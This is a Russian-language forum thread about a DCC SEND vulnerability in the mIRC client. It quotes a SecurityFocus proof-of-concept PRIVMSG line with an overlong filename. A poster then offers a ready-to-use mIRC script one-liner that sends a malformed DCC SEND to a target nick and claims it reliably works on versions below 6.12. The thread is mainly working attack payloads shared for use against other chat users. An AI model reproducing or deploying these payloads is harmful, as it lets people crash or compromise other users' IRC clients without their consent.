![]() |
MIRC 6.12 eXploit
AXTUNG!
Securityfocus objavil o novom exploite: The following proof of concept has been supplied. It should be noted that this proof of concept has not been confirmed to work against this specific vulnerability. However, due to the similarity to the issue previously disclosed (BID 8818), it is believed that this issue will effectively trigger the bug of the required sequence of events are carried out by the victim user. /quote PRIVMSG #mirc :^ADCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a" 1363975063 3500 4^A no: zatestil etot exploit na sebja i ne rabotaet. pozhaluista, proiasnite v chom delo. /quote PRIVMSG #mirc : v etom ne mogu xoroshenko razobratsa kogda vmesto #mirc pishu nick uzera, on prosto daet tekstovoe soobshenie etomu useru. nu, vi sami posmotrite. |
//raw privmsg <nick> : $+ $chr(1) $+ DCC SEND " $+ $str($+ $rand(a,z) $+ $chr(32),165) $+ " $longip(127.0.0.1) $rand(113,9999) $+ $chr(1)
сплойт для мирка ниже 6.12 - работает безотказно. На 6.12 не действует. |
| Часовой пояс GMT +4, время: 00:10. |
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.